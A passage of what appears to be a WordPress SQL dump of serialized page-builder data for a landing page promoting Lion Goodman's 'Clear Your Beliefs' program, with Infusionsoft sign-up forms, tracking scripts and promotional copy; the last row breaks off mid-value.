(1311, 1772, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1448:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2076:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form style="position: relative; bottom: -2px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1336:"<p>[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]</p><div style="height: auto; width: 100%;"><p><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" /></p><p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs </strong></big></p><p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong>– Permanently!</strong></big></p><form class="infusion-form rd-form-1" style="position: relative; bottom: -58px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><p><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit�&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /></p><div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2814:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1313, 1774, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1448:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2076:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form style="position: relative; bottom: -2px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:1208:"<p>[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]</p><div style="height: auto; width: 100%;"><p><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" /></p><p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs <br />– Permanently!</strong></big></p><form class="infusion-form rd-form-1" style="position: relative; bottom: -58px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><p><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit�&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /></p><div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2814:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:511:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><p> </p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1314, 1775, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1448:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2076:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form style="position: relative; bottom: -2px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1202:"<p>[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]</p><div style="height: auto; width: 100%;"><p><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" /></p><p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p><form class="infusion-form rd-form-1" style="position: relative; bottom: -58px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><p><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click 